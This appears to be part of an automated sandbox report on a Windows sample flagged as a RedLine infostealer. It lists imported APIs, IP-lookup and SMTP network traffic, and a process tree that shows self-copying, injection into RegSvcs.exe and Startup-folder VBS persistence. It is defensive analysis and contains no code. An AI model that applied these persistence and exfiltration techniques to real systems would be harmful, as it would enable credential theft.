                          MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
                          WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
                          PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
                          USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
                          KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
                          USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
                          GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
                          COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                          ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
                          SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                          ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
                          OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

                          Possible Origin

                          Language of compilation systemCountry where language is spokenMap
                          EnglishGreat Britain
                          EnglishUnited States

                          Network Behavior

                          Network Port Distribution

                          TCP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 8, 2024 14:44:18.842215061 CEST49730443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:18.842253923 CEST44349730104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:18.842387915 CEST49730443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:18.869170904 CEST49730443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:18.869187117 CEST44349730104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:19.340712070 CEST44349730104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:19.340868950 CEST49730443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:19.343400002 CEST49730443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:19.343419075 CEST44349730104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:19.343677044 CEST44349730104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:19.386719942 CEST49730443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:19.387401104 CEST49730443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:19.435398102 CEST44349730104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:19.509462118 CEST44349730104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:19.509609938 CEST44349730104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:19.509804964 CEST49730443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:19.517626047 CEST49730443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:20.038777113 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:20.043888092 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:20.043968916 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:20.936208010 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:20.936414003 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:20.941366911 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.097505093 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.097913027 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.103420019 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.258491993 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.260606050 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.265564919 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.423360109 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.423397064 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.423408985 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.423419952 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.423433065 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.423499107 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.423546076 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.453280926 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.458148956 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.613935947 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.616801977 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.621800900 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.777008057 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.778022051 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.783109903 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.940562010 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:21.945900917 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:21.951005936 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.109257936 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.109512091 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.114936113 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.272157907 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.272404909 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.277566910 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.458236933 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.458422899 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.463526964 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.618721008 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.640285969 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.640335083 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.640358925 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.640402079 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:22.645612001 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:22.645786047 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:23.020890951 CEST58749731198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:23.073704958 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:38.162275076 CEST49731587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:38.372858047 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.372912884 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.373136997 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.376445055 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.376466036 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.864310026 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.864458084 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.865997076 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.866008997 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.866342068 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:38.917536020 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.917855024 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:38.963407040 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:39.470359087 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:39.470540047 CEST44349738104.26.12.205192.168.2.4
                          Oct 8, 2024 14:44:39.470602036 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:39.476566076 CEST49738443192.168.2.4104.26.12.205
                          Oct 8, 2024 14:44:39.988236904 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:39.993257999 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:39.993475914 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:40.797152996 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:40.797447920 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:40.802615881 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:40.966017008 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:40.970283031 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:40.975234985 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.134866953 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.135368109 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.140527010 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305514097 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305588007 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305624962 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305660009 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305676937 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.305700064 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.305727005 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.307543993 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.312464952 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.472243071 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.479410887 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.484390020 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.644237041 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.645514011 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.650739908 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.811187029 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:41.811538935 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:41.816611052 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.006211042 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.006841898 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.012226105 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.174082994 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.174401045 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.180322886 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.362207890 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.362700939 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.367772102 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.527158976 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.527852058 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.527915001 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.527940989 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.527982950 CEST49739587192.168.2.4198.54.122.135
                          Oct 8, 2024 14:44:42.532969952 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:42.533732891 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:43.148051977 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:43.148281097 CEST58749739198.54.122.135192.168.2.4
                          Oct 8, 2024 14:44:43.148426056 CEST49739587192.168.2.4198.54.122.135

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Oct 8, 2024 14:44:18.824395895 CEST6117153192.168.2.41.1.1.1
                          Oct 8, 2024 14:44:18.831677914 CEST53611711.1.1.1192.168.2.4
                          Oct 8, 2024 14:44:20.030275106 CEST6078453192.168.2.41.1.1.1
                          Oct 8, 2024 14:44:20.038211107 CEST53607841.1.1.1192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Oct 8, 2024 14:44:18.824395895 CEST192.168.2.41.1.1.10xae75Standard query (0)api.ipify.orgA (IP address)IN (0x0001)false
                          Oct 8, 2024 14:44:20.030275106 CEST192.168.2.41.1.1.10xd87cStandard query (0)mail.privateemail.comA (IP address)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Oct 8, 2024 14:44:18.831677914 CEST1.1.1.1192.168.2.40xae75No error (0)api.ipify.org104.26.12.205A (IP address)IN (0x0001)false
                          Oct 8, 2024 14:44:18.831677914 CEST1.1.1.1192.168.2.40xae75No error (0)api.ipify.org172.67.74.152A (IP address)IN (0x0001)false
                          Oct 8, 2024 14:44:18.831677914 CEST1.1.1.1192.168.2.40xae75No error (0)api.ipify.org104.26.13.205A (IP address)IN (0x0001)false
                          Oct 8, 2024 14:44:20.038211107 CEST1.1.1.1192.168.2.40xd87cNo error (0)mail.privateemail.com198.54.122.135A (IP address)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • api.ipify.org

                          HTTPS Proxied Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.449730104.26.12.2054437376C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          TimestampBytes transferredDirectionData
                          2024-10-08 12:44:19 UTC155OUTGET / HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                          Host: api.ipify.org
                          Connection: Keep-Alive
                          2024-10-08 12:44:19 UTC211INHTTP/1.1 200 OK
                          Date: Tue, 08 Oct 2024 12:44:19 GMT
                          Content-Type: text/plain
                          Content-Length: 11
                          Connection: close
                          Vary: Origin
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 8cf638bd88948cad-EWR
                          2024-10-08 12:44:19 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                          Data Ascii: 8.46.123.33


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.449738104.26.12.2054437880C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          TimestampBytes transferredDirectionData
                          2024-10-08 12:44:38 UTC155OUTGET / HTTP/1.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                          Host: api.ipify.org
                          Connection: Keep-Alive
                          2024-10-08 12:44:39 UTC211INHTTP/1.1 200 OK
                          Date: Tue, 08 Oct 2024 12:44:38 GMT
                          Content-Type: text/plain
                          Content-Length: 11
                          Connection: close
                          Vary: Origin
                          CF-Cache-Status: DYNAMIC
                          Server: cloudflare
                          CF-RAY: 8cf639379cd1180d-EWR
                          2024-10-08 12:44:39 UTC11INData Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                          Data Ascii: 8.46.123.33


                          SMTP Packets

                          TimestampSource PortDest PortSource IPDest IPCommands
                          Oct 8, 2024 14:44:20.936208010 CEST58749731198.54.122.135192.168.2.4220 PrivateEmail.com prod Mail Node
                          Oct 8, 2024 14:44:20.936414003 CEST49731587192.168.2.4198.54.122.135EHLO 116938
                          Oct 8, 2024 14:44:21.097505093 CEST58749731198.54.122.135192.168.2.4250-mta-10.privateemail.com
                          250-PIPELINING
                          250-SIZE 81788928
                          250-ETRN
                          250-AUTH PLAIN LOGIN
                          250-ENHANCEDSTATUSCODES
                          250-8BITMIME
                          250-CHUNKING
                          250 STARTTLS
                          Oct 8, 2024 14:44:21.097913027 CEST49731587192.168.2.4198.54.122.135STARTTLS
                          Oct 8, 2024 14:44:21.258491993 CEST58749731198.54.122.135192.168.2.4220 Ready to start TLS
                          Oct 8, 2024 14:44:40.797152996 CEST58749739198.54.122.135192.168.2.4220 PrivateEmail.com prod Mail Node
                          Oct 8, 2024 14:44:40.797447920 CEST49739587192.168.2.4198.54.122.135EHLO 116938
                          Oct 8, 2024 14:44:40.966017008 CEST58749739198.54.122.135192.168.2.4250-mta-10.privateemail.com
                          250-PIPELINING
                          250-SIZE 81788928
                          250-ETRN
                          250-AUTH PLAIN LOGIN
                          250-ENHANCEDSTATUSCODES
                          250-8BITMIME
                          250-CHUNKING
                          250 STARTTLS
                          Oct 8, 2024 14:44:40.970283031 CEST49739587192.168.2.4198.54.122.135STARTTLS
                          Oct 8, 2024 14:44:41.134866953 CEST58749739198.54.122.135192.168.2.4220 Ready to start TLS

                          Statistics

                          CPU Usage

                          Click to jump to process

                          Memory Usage

                          Click to jump to process

                          High Level Behavior Distribution

                          Click to dive into process behavior distribution

                          Behavior

                          Click to jump to process

                          System Behavior

                          General

                          Target ID:0
                          Start time:08:44:07
                          Start date:08/10/2024
                          Path:C:\Users\user\Desktop\q6utlq83i0.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\q6utlq83i0.exe"
                          Imagebase:0x400000
                          File size:1'301'411 bytes
                          MD5 hash:2B2832A4E1BF4E26E59980F4162334E2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:1
                          Start time:08:44:13
                          Start date:08/10/2024
                          Path:C:\Users\user\AppData\Local\inhumate\incalculability.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\q6utlq83i0.exe"
                          Imagebase:0x400000
                          File size:1'301'411 bytes
                          MD5 hash:2B2832A4E1BF4E26E59980F4162334E2
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Antivirus matches:
                          • Detection: 100%, Avira
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 63%, ReversingLabs
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:2
                          Start time:08:44:16
                          Start date:08/10/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\q6utlq83i0.exe"
                          Imagebase:0xd00000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:4
                          Start time:08:44:25
                          Start date:08/10/2024
                          Path:C:\Windows\System32\wscript.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\incalculability.vbs"
                          Imagebase:0x7ff77cf30000
                          File size:170'496 bytes
                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:5
                          Start time:08:44:26
                          Start date:08/10/2024
                          Path:C:\Users\user\AppData\Local\inhumate\incalculability.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\inhumate\incalculability.exe"
                          Imagebase:0x400000
                          File size:1'301'411 bytes
                          MD5 hash:2B2832A4E1BF4E26E59980F4162334E2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.1899832832.0000000003B40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:6
                          Start time:08:44:31
                          Start date:08/10/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\AppData\Local\inhumate\incalculability.exe"
                          Imagebase:0x60000
                          File size:45'984 bytes
                          MD5 hash:9D352BC46709F0CB5EC974633A0C3C94
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          General

                          Target ID:7
                          Start time:08:44:32
                          Start date:08/10/2024
                          Path:C:\Users\user\AppData\Local\inhumate\incalculability.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\inhumate\incalculability.exe"
                          Imagebase:0x400000
                          File size:1'301'411 bytes
                          MD5 hash:2B2832A4E1BF4E26E59980F4162334E2
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          General

                          Target ID:10
                          Start time:08:44:36
                          Start date:08/10/2024
                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Local\inhumate\incalculability.exe"
                          Imagebase:0xa60000
                          File size:45'984 bytes
